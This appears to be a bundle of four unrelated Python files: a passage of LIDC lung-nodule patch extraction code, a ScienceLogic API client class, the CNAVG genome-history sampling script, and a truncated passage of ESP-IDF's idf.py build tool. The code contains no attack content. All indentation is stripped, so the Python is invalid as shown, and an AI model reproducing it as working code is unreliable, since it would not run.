fakeImage = np.zeros((np.shape(currentSlice)[0], np.shape(currentSlice)[1]))
fakeImage[rectPos[0]:(rectPos[0]+rectPos[2]), rectPos[1]:(rectPos[1]+rectPos[3])] = 1
rotateFake = tf.rotate(fakeImage, angle=angle, resize=True)
scaleFake = tf.warp(rotateFake, tfScale, output_shape = (int(scaleFactor*rotateImage.shape[0]), int(scaleFactor*rotateImage.shape[1])))
shearFake = tf.warp(scaleFake, tfShear) #not using the output_size option, somehow the sheared image won't be centered in it
shearFake = shearFake.astype('bool')
[row, col] = np.where(shearFake==1)
rectPosNew = [min(row), min(col), max(row)-min(row)+1, max(col)-min(col)+1] #this defines the transformed box
centerPointNew = np.array((int(rectPosNew[0]+.5*rectPosNew[2]), int(rectPosNew[1]+.5*rectPosNew[3]))) #find the center of the box
#initialize output size in first iteration of loop
procImage = np.zeros((shearFake.shape[0], shearFake.shape[1], relevantSlices.shape[2]), dtype = 'float64')
procImage[:,:,i] = shearImage.copy()
if relevantSlices.dtype == array_int16.dtype:
#>>>crop_3d fn returns a patch of type float, and a float is what gets written
#out; so in the end float type is forced, but good to do the conversion back to original dtype
#(bc rotation, etc result in normalized to 0,1 type float image) before that step for consistency
procImage[:,:,i] = (imageMin + shearImage * (imageMax-imageMin)).astype('float64')
cropTrans = np.zeros(patchSize, dtype=float) #this is important; bc crop_3d also does this, & vol is written as float
cropTrans[:,:,:]=procImage[int(centerPointNew[0]-patchSize[0]/2):int(centerPointNew[0]+patchSize[0]/2), int(centerPointNew[1]-patchSize[1]/2):int(centerPointNew[1]+patchSize[1]/2),:]
np.save(os.path.join(aug_transPath, case_id + '_m' + "%02d" % (indParamArray,)), cropTrans)
#########################################################################
#ensure_dir
#Creates direcotry if doesnt exist
#########################################################################
def ensure_dir(f):
#d = os.path.dirname(f)
if not os.path.exists(f):
os.makedirs(f)
ensure_dir(pos_output_path), ensure_dir(neg_output_path)
ensure_dir(aug_output_path), ensure_dir(aug_aux_output_path)
def calculateintersect(cube1,cube2): #See comments in can_nodule above for how these args are actually defined
x_overlap = max(0, min(cube1.x_size, cube2.x_size) - max(cube1.x, cube2.x))
y_overlap = max(0, min(cube1.y_size, cube2.y_size) - max(cube1.y, cube2.y))
z_overlap = max(0, min(cube1.z_size, cube2.z_size) - max(cube1.z, cube2.z))
return abs(x_overlap * y_overlap * z_overlap)
#def path_creat(file_name):
# spl_dir=file_name[:].replace('_','/')
# return spl_dir
nudulsize={}
case_num=1
for case in lidc_case_list: #lidc_case_list has elements like 'p0049_20000101_s3000627.npy'
pos_nodules_in_each_case=[]
mat_dir=lidcPath+path_creat(case)[:-4]
mat_name=mat_pre+case[:-4]+".mat"
if os.path.exists(os.path.join(mat_dir, mat_name)):
mat_contents = sio.loadmat(os.path.join(mat_dir, mat_name))
oct_struct=mat_contents['uniqueStats']
input_3d_npy = np.load(os.path.join(numpy_master_case_path, case))
input_3d_npy = input_3d_npy.astype('int16') #for cases that are uint16
for cases_ind in range(len(mat_contents["uniqueStats"])): #this is looping over nodules in uniqueStats
# print (oct_struct[cases_ind]["CasePath"][0][0].replace('/','_')[31:]+'_'+str(cases_ind) ), #creating unique is for pat
case_id=oct_struct[cases_ind]["CasePath"][0][0].replace('/','_')[len(lidcPath):]+'_'+str(cases_ind)
case_y= oct_struct[cases_ind]["minX"][0][0][0]
case_x= oct_struct[cases_ind]["minY"][0][0][0]
case_z= oct_struct[cases_ind]["minZ"][0][0][0]
case_y_max= oct_struct[cases_ind]["maxX"][0][0][0] # case_n=can_nudul(case_id,cases_ind)
case_x_max= oct_struct[cases_ind]["maxY"][0][0][0]
case_z_max= oct_struct[cases_ind]["maxZ"][0][0][0]
case_y_avg= oct_struct[cases_ind]["avgCentroidX"][0][0][0] #Note that these are switched, e.g. case_Y_avg is avgCentroidX (bc the saved info is in matlab image coordinates)
case_x_avg= oct_struct[cases_ind]["avgCentroidY"][0][0][0]
case_z_avg= oct_struct[cases_ind]["avgCentroidZ"][0][0][0]
case_IURatio=oct_struct[cases_ind]["IURatio"][0][0][0]
my_nudule= can_nudul(case_id,case_x,case_y,case_z,case_x_max,case_y_max,case_z_max,case_x_avg,case_y_avg,case_z_avg,case_IURatio)
#input_3d_npy = np.load(os.path.join(numpy_master_case_path, case))
if my_nudule.IURatio == 0:
print "<3mm lesion, will not extract!"
if my_nudule.IURatio !=0:
# NOTE: Up to and including SPIE, The commented block below had two problems, first: this was
# within the loop adding each nodule info to pos_nodules_in_each_case; the negatives were then
# being extracted within same iteration, based on whether they intersected with current list of nodules
# (they should have been compared against info on ALL nodules); 2nd: if current pos patch could not
# be extracted, the code would have printed an error, but written out an empty array anyway!!!
#print my_nudule.IURatio
# emty_arry = np.zeros(patch_size, dtype=float)
# try:
# emty_arry[:, :, :] = crop_3d(case_x_avg, case_y_avg, case_z_avg, input_3d_npy)
# except:
# print("case",case,"couldn't be made ")
# np.save(pos_output_path + case_id, emty_arry)#saving the nodule itself
# save_aug_case(aug_output_path + case_id, emty_arry)
pos_nodules_in_each_case.append(my_nudule)
for currentNodInfo in pos_nodules_in_each_case:
#for each nodule>3mm that was added to pos_nodules_in_each_case, extract the pos patch;
#Then use random x,y,z
#coordinates to define a candidate neg patch; Check the candidate against every nodule coordinates
#to make sure it has no overlap, if that condition is met extract and save the neg patch;
#Note: Up to and including SPIE, this was using the avgCentroidZ for z slice, and then random x,y
emty_arry = np.zeros(patch_size, dtype=float)
try:
case_x_avg = currentNodInfo.avgCentroidX #row/col/slice of avg centroid
case_y_avg = currentNodInfo.avgCentroidY
case_z_avg = currentNodInfo.avgCentroidZ
case_id = currentNodInfo.case_id
emty_arry[:, :, :] = crop_3d(case_x_avg, case_y_avg, case_z_avg, input_3d_npy)
np.save(os.path.join(pos_output_path, case_id), emty_arry)#saving the nodule itself
save_aug_case(os.path.join(aug_output_path, case_id), emty_arry)
if transFlag == 1:
relevantSlices = crop_relevantSlices(case_z_avg, input_3d_npy, patch_size)
aug_transParams = {}
aug_transParams['noduleCentroid'] = np.array((case_x_avg, case_y_avg, case_z_avg))
aug_transParams['patchSize'] = patch_size
aug_transParams['aug_transPath'] = aug_aux_output_path
aug_transParams['case_id'] = case_id
Aug_trans(relevantSlices, aug_transParams)
except KeyboardInterrupt:
print('Manual keyboard interrupt, aborting!')
sys.exit(0)
except:
print("case",currentNodInfo.case_id,"couldn't be made ") #case_id combines patient identifier & nodule tag -1
continue
ind = 1
#z = currentNodInfo.avgCentroidZ
for z in xrange(randint(int(patch_size[2]/2), 30), input_3d_npy.shape[2]-int(patch_size[2]/2),randint(25,50)):
for y in xrange(randint(int(patch_size[1]/2),50), input_3d_npy.shape[1]-int(patch_size[1]/2), randint(50,150)):
for x in xrange(randint(int(patch_size[1]/2),50), input_3d_npy.shape[0]-int(patch_size[0]/2), randint(50,150)):
#window basically has the bbox of the candidate neg patch
window = can_nudul_pos_neg(x, y, z, x + patch_size[0], y + patch_size[1],
z + patch_size[2])
print x,y,z
#flag=False
intersection=0 #this is the overal intersection area; for each candidate '-', check against every positive in that case; if no overlap with any, extract.
for items in pos_nodules_in_each_case:
intersection=int(calculateintersect(window,items)+intersection)
if intersection==0:
neg_emty_arry=np.zeros(patch_size, dtype=float)
try:
neg_emty_arry[:, :, :] = crop_3d(x,y,z, input_3d_npy)
np.save(os.path.join(neg_output_path, case_id + '_' +str(x)+'_'+str(y)+'_'+str(z)+'_'+ str(ind)), neg_emty_arry)
ind += 1
except KeyboardInterrupt:
print('Manual keyboard interrupt, aborting!')
sys.exit(0)
except:
print "Selected coordinates for negative patch cannot be cropped",x,y,z
# try:
# ind = 1
# z=case_z_avg
# # for z in xrange(randint(0,40), input_3d_npy.shape[2]-int(patch_size[2]/2),randint(40,60)): # this goes into each case and generates the negative cases
# for y in xrange(randint(0,50), input_3d_npy.shape[1]-int(patch_size[1]/2), randint(50,200)):
# for x in xrange(randint(0,100), input_3d_npy.shape[0]-int(patch_size[0]/2), randint(50,200)):
# window = can_nudul_pos_neg(x, y, z, x + patch_size[0], y + patch_size[1],
# z + patch_size[2])
# print x,y,z
# flag=False
# intersection=0 #this is the overal intersection area; for each candidate '-', check against every positive in that case; if no overlap with any, extract.
# for items in pos_nodules_in_each_case:
# intersection=int(calculateintersect(window,items)+intersection)
# if intersection==0:
# neg_emty_arry=np.zeros(patch_size, dtype=float)
# try:
# neg_emty_arry[:, :, :] = crop_3d(x,y,z, input_3d_npy)
# np.save(neg_output_path + case_id + '_' +str(x)+'_'+str(y)+'_'+str(z)+'_'+ str(ind), neg_emty_arry)
# ind += 1
# except:
# print "selected coordinates wasnt match the input volume size to be croped",x,y,z
# else:
# print ("there is a overlap with posetive case")
# except:
# print case_id, "got error in negatives"
# print sys.exc_info()
| |
"""Comunicating with the API server."""
import json
import logging
import requests
import hashlib
import ast
from requests.auth import HTTPBasicAuth
from urllib.parse import urljoin
from .custom_errors import AuthError
from .custom_errors import KeywordArgument
class BaseAPI(object):
keyword_arguments = None
lists = None
bools = None
dicts = None
@classmethod
def __init__(cls, **kwargs):
[setattr(cls, key, value) for key, value in kwargs.items()]
@classmethod
def set_connection(cls, user_name, password, end_point, session_verify):
"""Setting the connection settings for the API server.
:param user_name: the API accounts user name
:param password: the API account password
:param end_point: the API's URL/end point
:param session_verify: if you want to check the API cert or not
"""
if not session_verify:
requests.packages.urllib3.disable_warnings()
cls.user_name = user_name
cls.password = password
cls.end_point = end_point
cls.session = requests.Session()
cls.session.auth = HTTPBasicAuth(user_name, password)
cls.session.verify = session_verify
@classmethod
def _perform_request(cls, url='', request_type='GET', params=None):
"""
This method will perform the real request,
in this way we can customize only the "output".
This method will return the request object.
"""
get = 'GET'
post = 'POST'
delete = 'DELETE'
put = 'PUT'
if params:
params = json.dumps(params)
if cls.user_name is None or not cls.user_name:
raise AuthError("Missing user name. Please provide a valid user name.")
if cls.password is None or not cls.password:
raise AuthError("Missing password. Please provide a valid password.")
url = cls.end_point + url
if request_type.upper() == get:
return cls.session.get(url, stream=False)
elif request_type.upper() == post:
logging.info('{0} - {1}'.format(request_type, params))
return cls.session.post(url, data=params, stream=False)
elif request_type.upper() == delete:
logging.info('{0} - {1}'.format(request_type, params))
return cls.session.delete(url, stream=False)
elif request_type.upper() == put:
logging.info('{0} - {1}'.format(request_type, params))
return cls.session.put(url, data=params, stream=False)
@classmethod
def post(cls, uri, payload):
"""Create an item on the Science Logic server
:param uri: The name of the item you wish to create
:param payload: The payload for the item you wish to create
:return: returns servers response to the POST request
"""
return cls._perform_request(uri, 'POST', payload)
@classmethod
def delete(cls, uri):
"""Delete a record from the API server
:param uri: The URI to the item you wish to delete
:return: returns servers response to the DELETE request
"""
return cls._perform_request(uri, 'DELETE')
@classmethod
def get(cls, uri):
"""Get an item by the URI
:param uri : The URI for the item you wish to get data for.
:return: returns servers response to the GET request
"""
return cls._perform_request(uri, 'GET')
@classmethod
def find(cls, uri='/api/', search_spec='name', search_string='test', extended_fetch=False):
"""Find an Organization by name not id
:note: extended_fetch= True to return full objects
:param uri: The URI for you wish to preform the search at
:apram search_spec: What you are shearching by
:param search_string: What you are searching for
:param extended_fetch: Do you want the full objects or just the
URI and description
:return: returns With organization you searched for
"""
if extended_fetch:
options = "?limit=100&hide_filterinfo=1&extended_fetch=1&filter."
else:
options = "?limit=100&hide_filterinfo=1&filter."
search = "{uri}{options}{search_spec}={search_string}".format(
uri=uri,
options=options,
search_spec=search_spec,
search_string=search_string
)
return cls._perform_request(url=search, request_type='GET')
@classmethod
def get_uri(cls, uri='/api/', search_spec='name', search_string='test'):
"""Get the URI for an item
:note: extended_fetch= True to return full objects
:param uri: The URI for you wish to preform the search at
:apram search_spec: What you are shearching by
:param search_string: What you are searching for
:param extended_fetch: Do you want the full objects or just the
URI and description
:example:
response = BaseAPI().get_uri(
uri='/api/organization',
search_string='test'
)
print(response)
# Output
{'test': '/api/organization/123'}
:return: returns a dict with the URI or URI's.
"""
response = cls.find(
uri=uri,
search_spec=search_spec,
search_string=search_string,
extended_fetch=False
)
uri_list = {}
if len(response.json()) == 1:
# Create a dict out of the response
uri_list = {response.json()[0]['description']: response.json()[0]['URI']}
else:
# Create a dict out of the response
for value in response.json():
uri_list.update({value['description']: value['URI']})
return uri_list
@classmethod
def payload(cls, **kwargs):
"""Creat a payload for a post or update request
:return: returns a dict with arguments as keyvalue pairs
"""
payload = {}
# If no lists, bools, or dicts have been defind
if cls.lists is None:
cls.lists = []
if cls.bools is None:
cls.bools = []
if cls.dicts is None:
cls.dicts = []
if cls.keyword_arguments is None:
cls.keyword_arguments = []
# If nothing has been passed in
if not kwargs:
kwargs = {}
for key, value in kwargs.items():
if key not in cls.keyword_arguments:
raise KeywordArgument('The keyword argument', key, 'is not supported')
continue
# Change strings to lists, bools, or dicts based on a provided list
if key in cls.lists:
if isinstance(value, str):
list_values = []
[list_values.append(value.strip(',')) for value in value.splitlines()]
else:
list_values = [value]
payload[key] = list_values
elif key in cls.bools:
payload[key] = ast.literal_eval(value)
elif key in cls.dicts:
payload[key] = json.loads(value)
elif key == 'passwd':
payload[key] = hashlib.md5(str.encode(value, 'utf-8')).hexdigest()
else:
payload[key] = value
return payload
@classmethod
def create(cls, uri=None, search_spec=None, search_string=None,
payload=None, **kwargs):
"""Creates an item on the server"""
exists = cls.find(uri=uri, search_spec=search_spec,
search_string=search_string, extended_fetch=False)
if not exists.json():
return cls.post(uri, payload)
else:
return exists
@classmethod
def update(cls, uri, search_spec='name', search_string='test', extended_fetch=False,
**kwargs):
"""Upate an Organization on the server"""
exists = cls.find(uri=uri, search_spec=search_spec, search_string=search_string)
if not exists.json():
updates = cls.payload(**kwargs)
return cls.post(uri, updates)
else:
return exists
@classmethod
def close(cls):
cls.session.close()
| |
#!/usr/bin/env python
# Copyright (c) 2012, Daniel Zerbino
# All rights reserved.
#
# (1) Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# (2) Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# (3)The name of the author may not be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import sys
import os
import os.path
import argparse
import cPickle as pickle
import random
import glob
import gzip
import cnavg.preprocess.vcf as vcf
import cnavg.preprocess.bambam as bambam
import cnavg.avg.balanced as balancedAVG
import cnavg.cactus.graph as cactus
import cnavg.cactusSampling.sampling as normalized
import cnavg.cactus.oriented as oriented
import cnavg.cactus.balanced as balancedCactus
import cnavg.historySampling.cycleCover as cycleCover
import cnavg.historySampling.sampleGraphCycles as sampleGraphCycles
import cnavg.history.flattened as flattened
import cnavg.history.ordered as ordered
import cnavg.history.debug as debug
from cnavg.history.ordered import prettify
def _parseOptions():
print "Parsing options"
parser = argparse.ArgumentParser(description="Process a VCF files to sample possible historical explanations")
parser.add_argument('--vcf', '-v', dest='vcffile', type=file, help='A VCF (ver >= 4.1) file')
parser.add_argument('--bambam', '-b', dest='bambam', nargs='*', help='BamBam files')
parser.add_argument('--snps', '-p', dest='snpsfiles', nargs='*', help='SNPs files (optional)')
parser.add_argument('--index', '-i', dest='index', type=int, help='ID of sampling run')
parser.add_argument('--breaks', '-k', dest='breaks', type=file, help='A BamBam breaks file')
parser.add_argument('--lengths', '-l', dest='chromLengths', type=file, help='Chromosome lengths')
parser.add_argument('--dir', '-d', dest='dir', help='Working directory')
parser.add_argument('--debug', '-g', dest='debug', action='store_true', help='Debug switch for whatever')
parser.add_argument('--continue', '-c', dest='cont', action='store_true', help='Continue sampling for 24 hours')
parser.add_argument('--integer', '-n', dest='integer', action='store_true', help='Integer switch for idealized integer histories')
parser.add_argument('--simulation', dest='simulation', action='store_true', help='Simuated histories')
parser.add_argument('--tabbed', dest='tabbed', action='store_true', help='Tabbed BamBam breakend file')
parser.add_argument('--size', '-s', dest='size', type=int, default=100, help='Number of sampled histories')
parser.add_argument('--temp', '-t', dest='temp', type=float, default=1, help='Starting temperature of MCMC sampling')
return parser.parse_args()
def _parseGraph(options):
print "Parsing input files"
if options.bambam is not None and options.breaks is not None and options.chromLengths is not None:
options.bambam = sum(map(glob.glob, options.bambam), [])
assert len(options.bambam) > 0, options.bambam
breakends = bambam.parse(options.bambam, options.breaks, options.chromLengths, snpsfiles=options.snpsfiles, tabbed=options.tabbed)
elif options.vcffile is not None and options.chromLengths is not None:
breakends = vcf.parse(options.vcffile, options.chromLengths)
else:
if options.vcffile is None:
print "No VCF"
else:
print "VCF: %s" % options.vcffile
if options.chromLengths is None:
print "No chromosome lengths"
else:
print "Chromosome lengths: %s" % options.chromLengths
if options.bambam is None:
print "No BamBam files"
else:
print "BamBam files: %s" % options.bambam
if options.breaks is None:
print "No BamBam break file"
else:
print "Breaks lengths: %s" % options.breaks
sys.exit("Not enough files")
breakends.validate()
return breakends.avg()
def main():
options = _parseOptions()
sampleGraphCycles.TEMPERATURE = options.temp
if options.dir is not None:
if not os.path.exists(options.dir):
os.mkdir(options.dir)
os.chdir(options.dir)
if options.simulation:
debug.RATIO_TO_OFFSET = False
if options.index is None:
## Initial graph construction
G = _parseGraph(options)
B = balancedAVG.BalancedAVG(G)
C = cactus.Cactus(B)
pickle.dump(C, open('CACTUS', "wb"))
else:
H = None
if options.debug:
## Picking up from where we started
OC = pickle.load(open('CACTUS_%i' % options.index))
random.setstate(pickle.load(open("STATE_%i" % options.index)))
elif options.cont:
## Picking up from where we stopped
OC = pickle.load(open('CACTUS_%i' % options.index))
## Going through all the histories to the last in file
file= open('HISTORIES_%i' % (options.index))
while True:
try:
H = pickle.load(file)
except:
break
file.close()
else:
## Just moving from there
pickle.dump(random.getstate(), open("STATE_%i" % options.index, "wb"))
C = pickle.load(open('CACTUS'))
## Sampling possible cactus
NC = normalized.NormalizedCactus(C)
if debug.RATIO_TO_OFFSET:
BC = balancedCactus.BalancedCactus(NC)
else:
BC = NC
OC = oriented.OrientedCactus(BC)
## Saving sampled cactus
pickle.dump(OC, open('CACTUS_%i' % options.index, "wb"))
# Moving into historical space
if options.integer:
debug.INTEGER_HISTORY = True
if H is None:
H = cycleCover.initialHistory(OC)
FH = flattened.flattenGraph(H)
S = FH.simplifyStubsAndTrivials()
F = S.removeLowRatioEvents(debug.RATIO_CUTOFF)
O = ordered.OrderedHistory(F)
# Preparing file for progressive write
if options.cont:
stats_file = open("HISTORY_STATS_%li" % options.index, "a")
pickle_file = open('HISTORIES_%i' % options.index, "ab")
braney_file = gzip.open("HISTORIES_%i.braney" % options.index, "a")
else:
stats_file = open("HISTORY_STATS_%li" % options.index, "w")
pickle_file = open('HISTORIES_%i' % options.index, "wb")
braney_file = gzip.open("HISTORIES_%i.braney" % options.index, "w")
stats_file.write("%s\n" % H.stats())
#pickle.dump(H, pickle_file)
braney_file.write("%s\n" % O.braneyText(0, H.rearrangementCost()))
#tree_file = open("HISTORY_TREES_%li" % options.index, "w")
#tree_file.write("%s\n" % O.newick())
tree_file = None
# Sampling
SH = sampleGraphCycles.sample(H, options.size, pickle_file, stats_file, braney_file, tree_file)
# Cleaning up
stats_file.close()
pickle_file.close()
braney_file.close()
#tree_file.close()
## Removing temp file
if os.path.exists("STATE_%i" % options.index):
os.remove("STATE_%i" % options.index)
if __name__ == "__main__":
main()
| |
#!/usr/bin/env python
#
# 'idf.py' is a top-level config/build command line tool for ESP-IDF
#
# You don't have to use idf.py, you can use cmake directly
# (or use cmake in an IDE)
#
#
#
# Copyright 2019 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# WARNING: we don't check for Python build-time dependencies until
# check_environment() function below. If possible, avoid importing
# any external libraries here - put in external script, or import in
# their specific function instead.
import codecs
import json
import locale
import multiprocessing
import os
import os.path
import re
import shutil
import subprocess
import sys
class FatalError(RuntimeError):
"""
Wrapper class for runtime errors that aren't caused by bugs in idf.py or the build proces.s
"""
pass
# Use this Python interpreter for any subprocesses we launch
PYTHON = sys.executable
# note: os.environ changes don't automatically propagate to child processes,
# you have to pass env=os.environ explicitly anywhere that we create a process
os.environ["PYTHON"] = sys.executable
# Name of the program, normally 'idf.py'.
# Can be overridden from idf.bat using IDF_PY_PROGRAM_NAME
PROG = os.getenv("IDF_PY_PROGRAM_NAME", sys.argv[0])
# Make flavors, across the various kinds of Windows environments & POSIX...
if "MSYSTEM" in os.environ: # MSYS
MAKE_CMD = "make"
MAKE_GENERATOR = "MSYS Makefiles"
elif os.name == "nt": # other Windows
MAKE_CMD = "mingw32-make"
MAKE_GENERATOR = "MinGW Makefiles"
else:
MAKE_CMD = "make"
MAKE_GENERATOR = "Unix Makefiles"
GENERATORS = [
# ('generator name', 'build command line', 'version command line', 'verbose flag')
("Ninja", ["ninja"], ["ninja", "--version"], "-v"),
(
MAKE_GENERATOR,
[MAKE_CMD, "-j", str(multiprocessing.cpu_count() + 2)],
[MAKE_CMD, "--version"],
"VERBOSE=1",
),
]
GENERATOR_CMDS = dict((a[0], a[1]) for a in GENERATORS)
GENERATOR_VERBOSE = dict((a[0], a[3]) for a in GENERATORS)
def _run_tool(tool_name, args, cwd):
def quote_arg(arg):
" Quote 'arg' if necessary "
if " " in arg and not (arg.startswith('"') or arg.startswith("'")):
return "'" + arg + "'"
return arg
display_args = " ".join(quote_arg(arg) for arg in args)
print("Running %s in directory %s" % (tool_name, quote_arg(cwd)))
print('Executing "%s"...' % str(display_args))
try:
# Note: we explicitly pass in os.environ here, as we may have set IDF_PATH there during startup
subprocess.check_call(args, env=os.environ, cwd=cwd)
except subprocess.CalledProcessError as e:
raise FatalError("%s failed with exit code %d" % (tool_name, e.returncode))
def _realpath(path):
"""
Return the cannonical path with normalized case.
It is useful on Windows to comparision paths in case-insensitive manner.
On Unix and Mac OS X it works as `os.path.realpath()` only.
"""
return os.path.normcase(os.path.realpath(path))
def check_environment():
"""
Verify the environment contains the top-level tools we need to operate
(cmake will check a lot of other things)
"""
if not executable_exists(["cmake", "--version"]):
raise FatalError("'cmake' must be available on the PATH to use %s" % PROG)
# find the directory idf.py is in, then the parent directory of this, and assume this is IDF_PATH
detected_idf_path = _realpath(os.path.join(os.path.dirname(__file__), ".."))
if "IDF_PATH" in os.environ:
set_idf_path = _realpath(os.environ["IDF_PATH"])
if set_idf_path != detected_idf_path:
print(
"WARNING: IDF_PATH environment variable is set to %s but %s path indicates IDF directory %s. "
"Using the environment variable directory, but results may be unexpected..."
% (set_idf_path, PROG, detected_idf_path)
)
else:
print("Setting IDF_PATH environment variable: %s" % detected_idf_path)
os.environ["IDF_PATH"] = detected_idf_path
# check Python dependencies
print("Checking Python dependencies...")
try:
subprocess.check_call(
[
os.environ["PYTHON"],
os.path.join(
os.environ["IDF_PATH"], "tools", "check_python_dependencies.py"
),
],
env=os.environ,
)
except subprocess.CalledProcessError:
raise SystemExit(1)
def executable_exists(args):
try:
subprocess.check_output(args)
return True
except Exception:
return False
def detect_cmake_generator():
"""
Find the default cmake generator, if none was specified. Raises an exception if no valid generator is found.
"""
for (generator, _, version_check, _) in GENERATORS:
if executable_exists(version_check):
return generator
raise FatalError(
"To use %s, either the 'ninja' or 'GNU make' build tool must be available in the PATH"
% PROG
)
def _strip_quotes(value, regexp=re.compile(r"^\"(.*)\"$|^'(.*)'$|^(.*)$")):
"""
Strip quotes like CMake does during parsing cache entries
"""
return [x for x in regexp.match(value).groups() if x is not None][0].rstrip()
def _new_cmakecache_entries(cache_path, new_cache_entries):
if not os.path.exists(cache_path):
return True
current_cache = parse_cmakecache(cache_path)
if new_cache_entries:
current_cache = parse_cmakecache(cache_path)
for entry in new_cache_entries:
key, value = entry.split("=", 1)
current_value = current_cache.get(key, None)
if current_value is None or _strip_quotes(value) != current_value:
return True
return False
def _ensure_build_directory(args, always_run_cmake=False):
"""Check the build directory exists and that cmake has been run there.
If this isn't the case, create the build directory (if necessary) and
do an initial cmake run to configure it.
This function will also check args.generator parameter. If the parameter is incompatible with
the build directory, an error is raised. If the parameter is None, this function will set it to
an auto-detected default generator or to the value already configured in the build directory.
"""
project_dir = args.project_dir
# Verify the project directory
if not os.path.isdir(project_dir):
if not os.path.exists(project_dir):
raise FatalError("Project directory %s does not exist" % project_dir)
else:
raise FatalError("%s must be a project directory" % project_dir)
if not os.path.exists(os.path.join(project_dir, "CMakeLists.txt")):
raise FatalError(
"CMakeLists.txt not found in project directory %s" % project_dir
)
# Verify/create the build directory
build_dir = args.build_dir
if not os.path.isdir(build_dir):
os.makedirs(build_dir)
cache_path = os.path.join(build_dir, "CMakeCache.txt")
args.define_cache_entry = list(args.define_cache_entry)
args.define_cache_entry.append("CCACHE_ENABLE=%d" % args.ccache)
if always_run_cmake or _new_cmakecache_entries(cache_path, args.define_cache_entry):
if args.generator is None:
args.generator = detect_cmake_generator()
try:
cmake_args = [
"cmake",
"-G",
args.generator,
"-DPYTHON_DEPS_CHECKED=1",
"-DESP_PLATFORM=1",
]
if not args.no_warnings:
cmake_args += ["--warn-uninitialized"]
if args.define_cache_entry:
cmake_args += ["-D" + d for d in args.define_cache_entry]
cmake_args += [project_dir]
_run_tool("cmake", cmake_args, cwd=args.build_dir)
except Exception:
# don't allow partially valid CMakeCache.txt files,
# to keep the "should I run cmake?" logic simple
if os.path.exists(cache_path):
os.remove(cache_path)
raise
# Learn some things from the CMakeCache.txt file in the build directory
cache = parse_cmakecache(cache_path)
try:
generator = cache["CMAKE_GENERATOR"]
except KeyError:
generator = detect_cmake_generator()
if args.generator is None:
args.generator = (
generator
) # reuse the previously configured generator, if none was given
if generator != args.generator:
raise FatalError(
"Build is configured for generator '%s' not '%s'. Run '%s fullclean' to start again."
% (generator, args.generator, PROG)
)
try:
home_dir = cache["CMAKE_HOME_DIRECTORY"]
if _realpath(home_dir) != _realpath(project_dir):
raise FatalError(
"Build directory '%s' configured for project '%s' not '%s'. Run '%s fullclean' to start again."
% (build_dir, _realpath(home_dir), _realpath(project_dir), PROG)
)
except KeyError:
pass # if cmake failed part way, CMAKE_HOME_DIRECTORY may not be set yet
def parse_cmakecache(path):
"""
Parse the CMakeCache file at 'path'.
Returns a dict of name:value.
CMakeCache entries also each have a "type", but this is currently ignored.
"""
result = {}
with open(path) as f:
for line in f:
# cmake cache lines look like: CMAKE_CXX_FLAGS_DEBUG:STRING=-g
# groups are name, type, value
m = re.match(r"^([^#/:=]+):([^:=]+)=(.*)\n$", line)
if m:
result[m.group(1)] = m.group(3)
return result
def build_target(target_name, ctx, args):
"""
Execute the target build system to build target 'target_name'
Calls _ensure_build_directory() which will run cmake to generate a build
directory (with the specified generator) as needed.
"""
_ensure_build_directory(args)
generator_cmd = GENERATOR_CMDS[args.generator]
if args.ccache:
# Setting CCACHE_BASEDIR & CCACHE_NO_HASHDIR ensures that project paths aren't stored in the ccache entries
# (this means ccache hits can be shared between different projects. It may mean that some debug information
# will point to files in another project, if these files are perfect duplicates of each other.)
#
# It would be nicer to set these from cmake, but there's no cross-platform way to set build-time environment
# os.environ["CCACHE_BASEDIR"] = args.build_dir
# os.environ["CCACHE_NO_HASHDIR"] = "1"
pass
if args.verbose:
generator_cmd += [GENERATOR_VERBOSE[args.generator]]
_run_tool(generator_cmd[0], generator_cmd + [target_name], args.build_dir)
def _get_esptool_args(args):
esptool_path = os.path.join(
os.environ["IDF_PATH"], "components/esptool_py/esptool/esptool.py"
)
if args.port is None:
args.port = get_default_serial_port()
result = [PYTHON, esptool_path]
result += ["-p", args.port]
result += ["-b", str(args.baud)]
with open(os.path.join(args.build_dir, "flasher_args.json")) as f:
flasher_args = json.load(f)
extra_esptool_args = flasher_args["extra_esptool_args"]
result += ["--after", extra_esptool_args["after"]]
return result
def flash(action, ctx, args):
"""
Run esptool to flash the entire project, from an argfile generated by the build system
"""
flasher_args_path = { # action -> name of flasher args file generated by build system
"bootloader-flash": "flash_bootloader_args",
"partition_table-flash": "flash_partition_table_args",
"app-flash": "flash_app_args",
"flash": "flash_project_args",
"encrypted-app-flash": "flash_encrypted_app_args",
"encrypted-flash": "flash_encrypted_project_args",
}[
action
]
esptool_args = _get_esptool_args(args)
esptool_args += ["write_flash", "@" + flasher_args_path]
_run_tool("esptool.py", esptool_args, args.build_dir)
def erase_flash(action, ctx, args):
esptool_args = _get_esptool_args(args)
esptool_args += ["erase_flash"]
_run_tool("esptool.py", esptool_args, args.build_dir)
def monitor(action, ctx, args, print_filter):
"""
Run idf_monitor.py to watch build output
"""
if args.port is None:
args.port = get_default_serial_port()
